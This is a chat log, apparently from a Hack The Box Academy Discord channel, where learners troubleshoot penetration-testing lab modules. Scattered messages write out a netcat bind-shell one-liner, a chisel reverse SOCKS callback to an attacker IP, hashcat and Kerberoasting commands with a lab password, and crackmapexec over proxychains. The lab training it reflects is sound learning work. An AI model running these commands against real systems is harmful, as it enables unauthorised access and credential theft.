#modules

Yeah it's turned off

should I try resetting the target IP?

Wait I just did it the command through PowerShell to disable it and now it's not being removed. But it showed that it was already turned off when I checked it a bit ago. That's odd.

Holy hell

Has anyone done the nmap

Pentesting route

On attacking services

I’ve been stuck in question 3 for an hour

I though you just
smbclient -L -N \\<myIP>

Just keep getting an error

How am I supposed to know bobs password wtf

Bruh the password is given in the beginning the module

I thought I was supposed to find it

An hour down the drain

it's given in the beginning of the module

How come when I type it in it doesn’t do anything

lol I found that out

Just says login failure when I type th password

lyze the event with ID 4624, that took place on 8/3/2022 at 10:23:25. Conduct a similar investigation as outlined in this section and provide the name of the executable responsible for the modification of the auditing settings as your answer. Answer format: T_W_____.exe
after i found the event is services.exe the answer?

Windows Event Logs & Finding Evil mini-module badge

hey im on the information gathering web edition virtual hosts but im stuck i ran the following command gobuster -u http://<IP>(i am confused because should i be using the target ip or the inlanefreight.htb but nontheless i tried both and the latter gave me and error) -w /opt/useful/seclists/Discovery/DNS/subdomains-top1million.txt --apend-domain

did not work and i spent 10 minutes waiting getting a blank result

anyone got any tips?

strange

Holy hell something is wrong with that virtual machine 😭😭

I had to put in the password 5 times before it worked

Then I restarted it to see if it was me

And it took 5 errors again

Then I tried it again and same thing

Fix that shit mods

Use the latter, DNS subdomain enum doesnt work with ip, you need to put it in your hosts file

It took me 3 hours to figure out I had to spam tf out of the password

Bruh I should of just moved on

You on UDP vpn? Might be a bad connection

Yeah I was

Should I do tcp?

Yeah might've been dropping packets

Well up to you cos tcp is wayy slower

But is more reliable

Oh

Ohhhhhh

I’ll give it a try next time

Or maybe a different server

Thanks bro

Also discord mods or Community contribs arent staff so no access to the modules

I know to try that next time 😭

Oooh

Welp thanks bro

I did bro

Show

Too late I gave up and I’m doing to bed 😭

Never give up

Never surrender

xD

In the settings section? 🤣

lol

in this https://academy.hackthebox.com/module/77/section/843

i have to create a exploit but i dont know how i mean i just learned for windows not for web

i have to use this exploit https://www.rapid7.com/db/modules/auxiliary/scanner/http/wp_simple_backup_file_read/

can someone explain to me pls

Use msfconsole

i know i have to use msfconsole

but idk how to set config

show options will show you all the available settings to configure

The flag is at the location mentioned in the question

yeah but i have to go useless school for learning german

byee

See you later 🙂

OMG, dude thanks a lot for this! Can someone from HTB team please fix this?

It's just a windows thing, but you can make a post in #1234357888114364508 if you think something needs to be fixed.

Hi anyone willing to help/disccuss with me for - dacl attack 2 - skill assessment question 1
i know what attack to perform, but after all the process i still cannot access the flag, i'm doing it in windows machine provided.

Update
Manage to get it with linux, but still curious why failed using windows, if someone able to perform from windows could we have discussion, thanks.

Hi all, I'm on the "Shells & Payloads" module. I have a question to the "Bind Shell" section. In the command to initiate the bind shell on the target machine, the IP of the target is used in the nc call: "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f" . Why is this needed or beneficial? I tried in the section with and without the IP and both works. Any insight would be highly appreciated!

could be if there's multiple interfaces on the target

you can specify an ip to listen on a specific interface

that makes sense, thank you!

anyone good at reverse engineering? i have question.

#binex-rev read and follow #welcome to access

i got it, with the pwnbox. i guess the vpn is ass

hey guys, I was connecting to victim machine using chisel as said in the pivoting, tunneling module

I am facing this error when I try to connect client pivot host to server attacker machine

./chisel: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.32' not found (required by ./chisel)

you need to compile it statically or grab an old release binary

Hey guys who has the same problem on the AI path?

Should be pretty cut and dry from a Windows perspective if you got it via Linux. If you still wanted to chat about it, you can DM.

Is it possible to pass the first question of the "Attack Tuning" section from "sqlmap Essentials" without creating a tamper?

I tried hard to get it without the tamper, but I couldn't

How can I do it?

Please help me 😦 I am so stuck on this Skills Assessment of Information Gathering - Web Edition.
Description: What is the API key in the hidden admin directory that you have discovered on the target system?
Steps:
I have been facing "Error: error on running gobuster: bufio.Scanner: token too long" from the subdomains-top1million-110000.txt but I might have solve it with awk 'length($0) < 64000' subdomains-top1million-110000.txt > filtered_wordlist.txt
but then I just cant find the Status: 200 OK after doing the scanning 😦
p/s: I did add the ip in /etc/hosts and I am connecting to the htb vpn too. Despite working on a Kali Linux virtual machine, I think the open vpn is still working fine.

Your wordlist appears to be... messed up.

Sorry, I forgot to change the name when writing this because I copy from the commands I used on WSL 🥲 but still the problem persists

this is my second attemps with no 200 OK found 😦

what are the rewards specified in last line?

Your wordlist is broken - no use of gobuster will ever work until you resolve that.

how can I fix it please 😦 I did a filter because I guess the wordlist has some errors with lenght of a specific word. This is my attempt without changing the wordlist

ah yes, it was my mistake so sorry and thank you for the hint on my overlook

You get a gold star -- there are a few HTB badges. If there's anything more in the works I'm not aware.

You'll get a bagde

Is the "Footprinting Lab - Hard" skill assessment supposed to take hours to scan? i lowered the type of scan to something less comprehensive, am using the -A aggressive nmap flag, and its still taking forever.

Footprinting IPMI module - Im using pwnbox and i wanna know if its normal that hashcat take so long for a simple module exercice ?

In my notes I said that it does take a long time. I used the flags -sU

It shouldn't take that long
So make sure you have the right kind of hash and that you're using the right flags in hashcat. You can check the hashcat website to make sure what hashes are supposed to look like

i used this cli:
hashcat -m 7300 hash -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u
and it s running since 10min

use the rockyou.txt wordlist like in pretty much every assessment in hackthebox

it was way faster ty brother 😅

its the standard for CTF challenges to take like less than 10 minutes with the rockyou.txt wordlist when bruteforcing anything. If it takes longer, brute forcing is probably not the way to go.

Ok tysm

Guys can someone help me, i was doing the "Protected FIles" module of "Password Attacks" and the question asks: "Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer."

But where should I get the password for Kira? Like do i need to bruteforce ftp or ssh with rockyou? (passoword.list don't have it)

It's going to be from a previous section from the Password Attacks module. Highly advisable to save harvested creds from that module, as a just in case you need it later in the module. I just checked my notes and you should have gotten those creds from the Credential Hunting in Linux section.

Guys I am helping cybersecurity student to get into cybersecurity, I gave them this advice, and everytime I do, I feel like they become repulsive off me, is there anything wrong with my advice ?

First of all, your entire journey is going to be based on a question mentality

Secondly, for technicals, your curiosity in understanding a specific topic would highlight u between your colleagues, whether in uni or work inshallah, start with these three

1. Python : Explore the syntax thru the documentation + do codeceafters and learn how to automate network requests and file i/o, then finish the first 5 to 10 projects here : https://github.com/kurogai/100-redteam-projects
2. Learn linux thru practice, learn about wsl and Linux basic administration, and how can you adapt only a cli environment, but it would be better if you can install it alongside windows, and for 1 hour a day experiment with it and try to do all various tasks, youtube and hackthebox academy have pretty good resources
3. Last thing, a good field you can start in is web security, go to portswigger, It contains labs and verbal explanations in all various topics in web security / attacks ( with uni account, u can have an 8 dollars subscription on htb academy, I do really recommend it, the penetration tester path is verrryyyyy educative )

The last message is that researching Google is going to be your friend along the way, in everything, and question everything you face and try to understand the "why" and the "how"

Htb academy : https://academy.hackthebox.com/

Portswigger : https://portswigger.net/web-security

Install wsl on your windows before u start in Linux: https://youtu.be/AfVH54edAHU?si=RvW9cUe1ktvwKu-U

For linux, this guy is very beginner friendly : https://youtube.com/playlist?list=PLIhvC56v63IJIujb5cyE13oLuyORZpdkL&si=vQyrUnmvjJv-MDSA

maybe because your delivery feels like a phishing email

Hey guys I have this problem with the skills assesment of the prompt injection modeule, can anyone help?

It's on the pwnbox btw

Thank you, i will do it again

Ru serious ?

Hello! Currently in password attacks shadow passwd and opasswd section. I transfered the .bak files then combined then into a tmp/unshadow file and unshadowed them i think using the command in the module. I've been trying to use john and hashcat to crack them with the mutated_password. But hashcat gives a token exception 55/55 and john gives a wrong password. I was trying formatting md5 but that didn't work either. Don't know how else to go about it. Besides maybe a wrong file download

yes

and the title says "urgent: your future depends on this" 😭🙏

Something might have gotten skewed when you transferred the files. I can check out what you did via DM and let you know if you should just reset and try again.

Anyone here did the Cat room, kinda stuck in the last step

Better off asking that in #boxes unless it isn't a box.

I figured it out. I wasn't paying attention and just copying commands not realized for some reason when I tried to unshadow the pass hash would dissappear but it showed up if I sudo and John the downloaded .bak file Luckily I was able to be allowed to crack that file instead. But I don't know why that works I assumed I'd have to unshadow them both.

that makes sense as the shadow file is only readable by root

Pass the Ticket (PtT) from Linux Which group can connect to LINUX01? When i david@inlanefreight.htb@linux01:~$ id
uid=647401107(david@inlanefreight.htb) gid=647400513(domain users@inlanefreight.htb) groups=647400513(domain users@inlanefreight.htb)

i enger the goup name for the question and its not working. Can someone help?

Suggest rereading Identifying Linux and Active Directory Integration from the section reading.

found it same proces different user group was found

Experiencing difficulty continuing with logrotate section of linux priv esc. Repeatedly encountering a resource dependency error: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./logrotten.1). Is there a way to still execute the payload without sudo to install the missing dependency?

in order to avoid dependency issues you either need to compile on the target or compile the exploit statically

you have to bear in mind that the GLIBC version on a machine may differ from what you have on your own machine

For whatever reason I get a whole slew of unexpected errors attempting to compile on the target. I should also add that I compiled on the pwnbox which I figured would have a similar configuration to the target

why would it have similar config to a target? it's an up-to-date attack vm

the pwnbox is just a hosted parrot VM that you can use instead of your own

Regardless if I cannot compile on the target or modify the packages is there alterative course of action?

statically compile

gcc has the --static flag

I will try that thanks

What is the technical difference between static comp and the 'regular' method

static compilation basically packages the required libraries with it

instead of relying on the library to be on the machine

Ah that's good to know, will probably save me more than a few headaches in the future. Ill give it a go

That did it 🙏

is the id_rsa formatted properly?

it requires the ---BEGIN and ---END lines

always make sure with stuff like md5sum and stuff like that to make sure the checksums work out

it also helps to provide the module and section name

also: it's -p for port

not -P

hello, can anyone help me with the last question What is the flag contained within flag.txt in the skill assessment of login brute forcing module? i found out the name is T... but i dont know how i go from there

The module definitely covers what you should or could do next.

i build custom wordlists with cuppy and username ananrchy but i dont know even what the service is

ssh doenst rquire password so it doenst work and there is no ftp server?

If you are saying there aren't any local services, I'd reset the target.

no there is ssh but I dont get how i can login there or if i need to.

The module is about brute forcing logins right? You can DM if you'd like.

Hello all. I am having problems with Active Directory Enumeration & Attacks Room, specifically with DCSync Lab. The lab keeps disconnecting seconds after I succesfully RDP. I don't know what it could be, I switched VPN file, I restarted lab uncountable times. This is getting my nerves and I am thinking on cancelling my subscription because of this problem.

I've even tried with HTB VM, but the same problem, after few seconds or minutes it keeps disconnecting RDP with errors

So I think it's a problem with the lab.

in the gettin started final of the pentest path where you test your knowledge there is a upload file option in the admin portal which doesnt work when i press this. is it supposed to not work and i need to find another way or is it a glitch?

yo guys

im stuck on IPMI enum

I got problems with using proxychains and chisel. It's the crackmapexec lab. After chaing the proxychains.conf to socks5 1080. Then setting up the reverse server on pwnbox and client on the ws01 they connect. But using proxychains crackmapexec smb 172.16.1.10 -u - p --shares and looking at the verbose output it says no route to host and failes. I can't figure out the problem. I have used proxychains and chisel before and I'm doing exactly as I use to (i think)

im doing the hashing correctly but my pc is bad (using 5th gen i5 to crack the hash)

can someone dm me the hash to move on

the plain text*

Is the second task/question of this section really supposed to take forever?

use pwnbox

No. If you feel your computer isn't good enough, you can use the pwnbox.

ah yes

I forgot that option

When pwnbox is faster than my actual laptop...

@round parrot make sure that the IP you are specifying in your command is actually reachable and smb is open there

I checked with evilwinrm. Logged in on ws01 and enumerated the share on dc01. So it's there and should work.

proxychains evil-winrm works ?

How can i copy my hash to pwnbox ?

direct copy and paste not working

echo 'HashValueHere' > hash.txt

Nope, I can reach ws without proxychains, so I used evilwinrm and from ws01 I could use net view on dc01

Also cant connect to it directly from my host to send something

And see the share

Any Skills Assessment - File Upload Attacks chads? Can't even access flower.jpg (I have leaked upload.php using XXE and gotten the directory and naming scheme)

the pwnbox has a clipboard tool, you can see in the bottom of the screen

Something might be wrong with your proxychains/chisel setup there @round parrot

Life savior

Yep but even following the exempel it doesn't work. I got the connected on chisel. Changed the proxuconf to socks5 and 1080. So I can't really figure out what it is

okay curl instead of burp worked

Pwnbox hashes 2.5x times faster than my laptop (using linux as a main, not vm)...

Granted I haven't done that module just yet. Did you comment out the socks4 in the conf ?

hi could you help me with this question :

Yep, even changed the 4 to 5.. still... I guess it's a reset somewhere

Hmm

Changing the Browser to a chromium based, and using Pwnbox I'm able to keep working on DCSync. The only solution I found...

Can anyone help me with Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt. Password attacks, pash the hash

@fair cove isn't that attack explained in detail in the module itself ?

If it is I am stupid and I cant do it

DM if you wanna talk specifics

Pwnbox has been doing it for 32 mins, does it take that long ?

I double checked the hash format on hashcat examples and everything is right

Ok my bad

I m stuck on the last question in this module i look the walkthrough and did it myself but cant figure it out https://academy.hackthebox.com/module/289/section/3246

I mistakely copied the one from hashcat examples into hashcat

Braaah

Its taking a lot of time too

Did to try it with sudo

Can someone help me solve this question from the Footprinting module on the DNS page:
What is the FQDN of the host where the last octet ends with "x.x.x.203"?

You need some subdomain enumeration if I remember correctly @eternal current

i just set the password file to rockyou in msf and it worked

Same

I blindly followed the module and chose to crack it with

Computational power ?

I mean hashing lol

I haven't been able to find it 😦

What does dig any 'Target' @'IP' give you ? @eternal current

What about the zone transfer - axfr ... Go from there

Maybe try different wordlists too.

is there any way to connect to the terminal using my own when doing modules? Using the built in one slows me down quite a bit?
im on mac tho idk if thats an issu

yes use the vpn from your kali or whatever

no problem there install openssh (it might be on there already) download the vpn file and connect

Okay, so if I use openssh I can connect from that?

How come normal ssh doesn’t work?

"yes" but you need to connect from your testing environment

connecting from a mac box without like... any tooling is not gonna get you where you wanna be. prob best to setup a kali environment

kali vm i mean... same thing

So I need to use a vm tool for that?

To create a kali vm then openssh from that into the environment?

Basically what I’m trying to get at is that currently it’s really annoying having to read all the text etc and be scrolling up and down to answer the questions

To be able to see the instance

Idk if there’s some way to pop out the instance maybe?

Yes, you will need to host a VM, and connect in from there. Depending on what mac you have, you'll likely need an arm image, which may give you some trouble with certain applications.

Okay I see, let’s say for example I was running my PC on a Linux OS, could I just do everything on my own pc then?

To do most any of the labs, you'd need a pentesting distro, which should not be run outside of a VM.

Ahh okay I see

Is there a way to do this?

From the HTB instance

"pop out"?

Like currently the only way to access onto that instance is to be scrolling up and down until I see the box for it

So like go have it in a new window on another monitor

Whilst being able to scroll up and down the read the questions and text

There should be a button to have it in a new tab. Depending on your browser, you could just drag that tab to another monitor.

Oh okay I’ll have a look next time I’m on it thanks

In the real world do people use VMs for their pentesting?

Like they will never use their own machine?

Pentesting distros are not safe to use baremetal. They are not built for stability, they have to include tons of outdated packages (as some old tools require them), and using it as a daily driver would be dangerous, due to all the tools that would be available, if the machine was compromised at all.

VMs also make it easy to take snapshots, so you can have an environment that is always the same for reproduction.

Okay I see

i need help at: Kerberoasting - from Linux
Ad enumeration and attacks

https://academy.hackthebox.com/module/143/section/1274

i use this command : GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend

and just give the pass (known from one part of previous part) || Klmcargo2 || which is not even a spoiler its mentioned somewhere in the module. But it says incorrect credentials. how to solve this now

just a little tip, you can put the password in your command
GetUserSPNs.py -dc-ip 172.16.5.5 inlanefreight.local/forend:password

can I get some help with https://academy.hackthebox.com/module/296/section/3394, I cannot seem to download wpscan on kali linux, and even when using the instance and the exact command used earlier in the demonstration, wpscan -e p --url https://10.129.12.10 --disable-tls-checks --no-banner --plugins-detection passive -t 100 (the ip address changed to the target) the instance terminal gets stuck with the message [i] Updating the Database ... until it eventually times out

wpscan comes with kali

mine replies with the standard Command 'wpscan' not found, but can be installed with:
sudo apt install wpscan

weird, did you download the smaller version? they do have different versions with various tools. it sounds like you have it because you say the command updates the database

that happens when I run it on the htb daily instance, the parrot terminal

that's parrotos, not kali

I've been trying it with an openvpn connection using kali, and with the daily instance

make sure you can get online then wpscan should be able to update

what do you mean by get online?

make sure your kali box is connected to the internet

if wpscan is timing out updating the database i assume it can't reach the servers, so it's some kind of network issue

well, the updating database error occurs when I use the parrot terminal on htb, I'm pretty sure the command is right, on kali sudo apt install wpscan results in tons of errors that seem like failures to install the necessary dependencies

here is the parrot terminal error after timeout

the pwnbox has limited Internet connectivity unless you have made a purchase i think

Scan Aborted: Unable to get https://data.wpscan.org/metadata.json.sha512 (Timeout was reached)

your original statement said kali, which is not the pwnbox

my bad, I started with kali then said the instance in place of parrot

have you spent money on the site?

no

that's why. the pwnbox is limited

try --no-update as an argument maybe that'll work

Just ask your question here if it's about modules

Scan Aborted: Update required, you can not run a scan if a database file is missing.

probably just use your kali vm then. note that you can't use the pwnbox and vpn at the same time, one or the other

that might be the issue, I used the instance because openvpn was failing

they share the same IP so you can only use one at a time

got it, seems my openvpn has been off so that can't be the issue

well you know why the pwnbox is failing, so you'd have to switch to your kali box on vpn

or spend money on the site

I have no idea you'd have to reach out to support on the website

alright, thank you for your help and insight

anyone have issues installing sqlcmd?

im on Attacking SQL Databases module

tried sudo apt install sqlcmd as well :()

sqlcmd is a Windows command

omg im so out of it thank you

Hi is there anyone that can help me with the RDP and SOCKS Tunneling with SocksOverRDP section in the Pivoting, Tunneling, and Port Forwarding module? I've gotten to the point where I needed to connect to the Windows server at 172.16.6.155 with jasons credentials as instructed in the question, but whenever I try to connect through Remote Desktop it immediately closes my connection, saying it was lost due to network connectivity problems. I've already loaded SocksOverRDP.dll and configured Proxifier properly. I've also restarted the box as well incase that was the issue but it wasn't. Any help would be greatly appreciated.

Try changing servers or even regions. Make sure you're on the TCP VPN. MTU can also be an issue sometimes, and there are some commands you can use to optimize your RPD connection.

https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn

Ah nvm, figured out the issue. Had to set the performance to modem in the experience tab. Didn't think about that lol. Thanks for the help though.

Hello, do you know that in the JavaScript deobfuscation module, the source code section already has the flag, but it doesn't accept it as valid?

I already solved it xD

The key thing to this is to look for other available services; i dislike that they use netcat for connecting to these services, but it is what it is -- utilizing the standard tool for connecting to one of the services is 10x simpler than going through the nc route

this worked thank you

but why ?

maybe because you were inputting the password incorrectly

i will put it manually lets see

Hi I want some newbiees fir my teams 0 experience member for my ctf team those who want participate join my team

Htb ctf

you can also paste the password when it prompts for it

make a post in #1318239802931286066

it works
So my clipboard was the problem

Thank you !

Ok

Hi I got one more problems

I can't type msg general and # no access

read #welcome

How much would a bloodhound scan differ when we gather the data from a user with default privileges vs a user with more privileges, like an admin.

what module is that

anyone know why impacket-smbserver isnt pulling netntlmv2 hash?

thank you so much

You should use your own IP

look what you're calling

:)

omg

thank you! i took like a 4month hiatus from this and its not clicking yet. thank you for the push 🙂

Not actually a module, just a random question, I thought I asked on the red team discussion, my bad

are you asking for help on an exam bro

No

I'm doing cape path and kerberos module

I was just curious

oh okay

you'll see users, groups and a few machines on a low priv user, but none of the juicy stuff like who's logged in where or what acls you can abuse

you migh scrape together a kerberoast target if you're lucky

Hmm I get it, thanks a lot man

The wayback machine section seems softlocked

The archives for the questions no longer exist

Literally the only accessible archive left is Feb 10 2020 which displays nothing

The wayback machine shows entries but literally none can be pulled up

The records must have been erased during that whole incident a few months ago :/

module section and question?

Information Gathering - Web Edition -> Web Archives

" How many Pen Testing Labs did HackTheBox have on the 8th August 2018? Answer with an integer, eg 1234."

And related

I'm seeing a 302 redirect that seems to loop indefinitely

it seems to me working for me

always know your target, htb is not an american company

I have no idea what you're doing but every archive for "hackthebox.com" is not pulling up for me

works for me too

anyone else having massive lag issus, Active directory skillls assessment is not doable, all connections keep timing out, on several vpns now

Try changing regions, or read the VPN guide which has some great tips

https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn

they all have medium load too , even the less used one, yeh I have i've trtied them all

Is the specific date August 8 2018 working because recent archives are showing up for me, just not the ones needed for the question.

HTB wasn't hackthebox.com in 2018

Just realized there's even a hint of it in the module

@thin parrot

look at the images

i literally cant read those pixels

oh nvm

hello,
can someone help me with a task in module network enumeration with nmap -> service enumeration.
I have a problem with the question: Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer.

what I did:
I used service fast scan to get all open ports and their service versions:

Host is up (0.0089s latency).
Not shown: 94 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
110/tcp open pop3 Dovecot pop3d
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd (Ubuntu)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: NIX-NMAP-DEFAULT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

then I used the method described in the module:
sudo tcpdump -i tun0 host <local_ip> and <target_ip>
then
nc -nv <target_ip> <port>

then Im trying to get smth chaning the ports in nc but I cant get anything from it

can someone tell me what am I doing wrong or maybe I'm not look at the right place?

I think I may know which lab this was as I struggled on this one but without giving too much information (assuming I have this right) perhaps take a further look at what may relate to whats hosted on port 80?

Have you tried: checking banners? 👀

1 by 1

yes... am I blind or smth? haha

gimme 1 moment I can't remember exactly what I did to get this

have you tried enumerating ALL ports?

gonna do it again

what's your nmap command looking like?

sudo nmap -sV -Pn -p- -T4 <target_ip>

okay, nvm

I got the flag...

got it?

I had to wait more like BRUUUUH

yeah I knew it was on an off beat port

I mean, as I was talking here it was going and after 2 min it worked haha

but thx ❤️

yeah I usually do a fast port sweep scan then a script scan of all those ports

btw @waxen totem, do you remember doing those Labs (SS)?
Is Hard Lab like H-A-R-D or "human level"?

IIRC it was human level FOR ME

only cos I put off academy for a while and actually was doing boxes

the only one I was stuck on was the medium lab cos my scan gave me false data

im wondering when should I start doing boxes

mate you hacker you already been doing boxes

It was a year ago... forgot most of the things haha

Does anybody know if chisel works on Windows Server 2019? I tried the latest version and it was incompatible

I'd look for chisel binaries around that time otherwise you outta luck

There's no reason it shouldn't work, unless maybe you have defender on.

c:\chisel.exe client 10.10.16.18:8001 R:socks
This version of c:\chisel.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher.

That's... odd. I wonder why they compiled it like that

You can always use this powershell script instead: https://github.com/p3nt4/Invoke-SocksProxy

Which module is this?

Maybe its already on the machine in C:\tools

AD Enumeration & Attacks - Skills Assessment Part I

I had to upload it

Are you using the version from the pivoting module?

yes, though that was a linux one , and in that module i had hod to use a downgraded version to get it to work

this time using windows compiled executable

Shouldn't have any issues like that, unless maybe there was corruption when you copied it over. Either way, the script I linked is just better than chisel in every way.

Awesome ill give it a go, can it connect back to a chisel server on my attack host?

No, it does not require a server portion. It just hosts a socks proxy on the host directly.

awesome much appreciated

SSH for linux socks, and the script for windows

module (using crackmapexec) submodule {Searching for Accounts in Group Policy Objects}
whenever i try to do the practical questions getting this error
The NETBIOS connection with the remote host timed out.
tried restarting target machine

Try adding the argument --smb-timeout 5

worked thank you

been struggling to connect via ssh in terminal. keep timing out.. just trying to do the linux fundamental mod

can you ping the target

seemed to be timing out as well

oi - just caught my mistake

hello can i please get some help with starting point meow task 6 (What service do we identify on port 23/tcp during our scans? ) thanks so much

success!

I was off by a digit

now we are on a roll - that held me up the whole time 🙂

file inclusion assessment someone give me hint

ik the parameter is page

hello can i please get some help with starting point meow task 6 (What service do we identify on port 23/tcp during our scans? ) thanks so much

portscan bro

perform a service scan

ye

i was thinking port scan but it ends with t

what

yeah

he means the service ends with the letter T

yes exactly

@outer osprey do you know what tool to use to scan ports?

bro just service scan and see what results you get and remove the version number

n mapp is what i use

run nmap -h and search for "service scan"

specify the port so its faster

let him look for it in help/man page (can't give the answer straight up cuz it would be cheating or smth haha)

yea thats why i dint tell him the options itself

lol

@outer osprey got it?

Try asking in #starting-point

someone help me tho

tbh no

You may need to follow the instructions in #welcome to access it

file inclusion assessment i am stuck

i used directory methods and mixed with url encode

still i would get invalid input

i am guessing its filtering out ...// even after url encode i tried using php wrappers still dint work

@outer osprey please don't spoil answers. also starting point discussion is in #starting-point , this channel is for modules on the Academy platform.

@cloud urchin can I give him the command? he got the answer

I'm sorry, what?

command to get the answer he was looking for (nmap [options]) cuz I guess he just searched up tcp/23 service

he needs to ask in the channel dedicated to starting point, but he got the answer already he said

sorry i'm new to the discord

yes read the #rules and the instructions in #welcome to gain access to more channels here

is tlattice here bro need ur help fr im actually dying here

yea you can rdp from windows machine to other one

there is a windows pivot rdp method

but how would I know if rdp is allowed there in the first place?

hmmm your asking if the other machines rdp service is open?

Could I get a bit of a hint on Information Gathering - Web Edition -> Skills Assesment -> "What is the API key in the hidden admin directory that you have discovered on the target system?"

I found the hidden admin directory, trying to access it returns permanent redirect. Not sure what to do from here

@tulip copper please don't spoil content, you're revealing addresses and such of a skill assessment that people need to find.

@tulip copper there is metasploit module using a pivot so scan the targets and find the target info

i cant recall properly but i remember doing something like this

I have to get meterpreter first on that windows_1 (first machine) and autoroute traffic through SOCKS

yea now i remeber most likely when u try nmap through proxychains it will not give you a proper output you can use metasploit auxilary modules to find about the other machines on the network

I know that this skill assessment want you to get the port directly but I wanted to expand and run a scan from attacker host, I know I need to double pivot but how its my issue :/

are u rdpd into windows 1?

yes and can reach windows_2

did u rdp into windows 2

no

do u have creds?

yes

try rdp then

I got all the flags

Anyone..?

my concern is that in real engagement you wont be trying port by port

if I run commands from my box to the network of windows_2 it would be convient

oh so instead of having windows 1 as ur pivot u want windows 2 as ur pivot?

well thats not possible

cause u need windows 1 to reach 2

You could do it actually through pivot

not really, now my pivot is linux machine, I want windows_1 to be pivot

Use ligolo or chisel to start a tunnel or a socks proxy

If you're using chisel you'll need proxychains setup

Also proxychains only works with TCP iirc

So using ligolo is much more preferred

from linux machine to windows_1?

Yeah setup ligolo and create a tunnel interface

Its almost like having a vpn

https://legacy.thehacker.recipes/~/revisions/X3zcRQTzmPqPbYiycUUx/infra/pivoting

ohh ok I have to get familiaer with ligolo

breh i thought you had windows 1 as pivot cause u said this

i got confused

mb

sorry no, I have the linux machine a spivot to get into network of windows_1

I was thinking about using 2 dynamic port forwarding with ssh , dynamic port forwarding from my box to foothold linux machine. and access to that linux machine and use again dynamic port forwarding inside linux host (since windows_1 have ssh open) to access windows_2 network. But my issue is that linux machine doesnt have proxychains

did u curl

the page

what tools does the host have

well you could copy over proxychains

using scp

I have to try this

idk i havent done that

tho

I see double pivoting is not covered in this module nor ligolo

yea

thats y i told u to rdp

from ur linux

after u scan the services and find the creds

are you talking about first creds?

no im talking about the creds to rdp to windows

u prob need to find those

yes to lateral movement

yes

thanks bro for assistance

Now ReconSpider is not working

Man they really need to make a second modules channel

what for?

I gave up and looked up a guide online and I think something is wrong with HTBs end now which is pissing me off

ReconSpider?

The web crawler

This is just some outdated OSINT tool

Becasue sometimes it becomes a bit of a clusterfuck in here

did u find the vhosts

And for some reasons targets last 30 minutes less now which makes the time crunch much worse when you get stuck

I am well past that step

ok

did u curl the page to get api

key

i already passed that as well

ok so what are u trying now

I'm trying to get the email from another subdomain that was hidden based off of another subdomain found in the prior step

And to do that I'm trying to use reconspider which can pull information such as email addresses and a bunch of other pages/their contents etc

This is from the cbbh path yes?

However dev.web1337.inlanefreight.htb:ip yields nothing there is nothing under this domain according to the web crawler

There are no index pages that supposedly exist

Penetration Tester path

that domain looks wrong

web is the lowest subdomain under dev

That’s what I was thinking too

it is literally what gobuster shot out to me

no check the results of reconspider

btw what exegol image you using?

I did rthe results.json is empty

reinstalling mine now

waht

Nightly

brave soul

I just ran gobuster again
dev.web1337.inlanefreight.htb:port

Wait wait

I cant send screenshots yet

so I cant show you that it is a literal result

You’re using gobuster

get verified: instructions --> #welcome

yes im using gobuster

did u add this to hosts file

Should be let me check

oh

remove the port before u add

and I swear if you added it in with the port I'mma stab you

oh yeah that'll do it 🤦‍♂️

breh

Oh no dont worry I didnt even add it

ok do everything again

aight can anyone help me now

Ok ReconSpider is still not returning anything

delete the folder and rerun it

i think ur looking at the same result

in the command add the port

i did add the port

i feel like giving up these labs are such curveballs i dont get it

but no i have to pay annually to get step-by-step help

That is in fact the point

they're designed to force you to research and think logically

I have 6 minutes till I literally have to restart this entire process

and find your own mistakes of course

there's a + button next to the target timer

you can get 6 hours of target time

There is no + on my end :/

I literally have a gun to my head to finish this entire path by mid april so I dont have time to spend 4 hours on one fucking question because god forbid somebody posts useful instructions I can actually learn from

i now learn the CBBH path what is ur problem specifically may i can help u

bruh legit i gave u whats supposed to work

I might just have no other choice

to restart this

show me ur command

oh well

copy paste here

Oh my fucking god its because I didnt give it permission to create results.json

Thats why its not working

file inclusions

assessment

i solved already

i found parameter page

but i tried all the methods dint work

i mixed with url encoding still

dint work i tried automated that dint work

give a pointer

Oh my god it fucking ended on me
You know fuck HTB I'm charging back this whole fucking bullshit on my card, this platform SUCKS.

oh sorry i don't start the LFI section yet but no problem if u share ur payload and the response of the server

Sorry bout your frustration but that is the nature of Cyber
you can always provide feedback /feedback

i finsh LFI sction for ewptX

may its help us to solved

oh i dint use burp

hmm let me see

lol

GL

yea the page would just show invalid input validation thats it

i checked for session poisoning too

no cookies to poison

havent tried server log poison

lemme see

Just follow instructions in #welcome 🙂 3 simple steps

Account identifier can be found here: https://app.hackthebox.com/profile/settings

Then /identify TOKENHERE

Well I finally got to that.

I'm still not sure why ReconSpider is not working

All the vhosts are added

If the IP is an external one, yes (not 10.x.x.x), but without the port in your hosts file.

I mean I am literally following the steps of what someone did and the only difference is that they are getting results in results.json
Whereas I am getting absolutely nothing

are you tryna spider the subdomain or the base site?

That specific subdomain not the base site

I’m on my phone so can’t check atm. Gotta bring my kids to school and daycare in a few min too

try the base site

😉

I actually finally got the results
Something must have been funky with the last session I had

I really need to set up a vm and download the vpn from now on

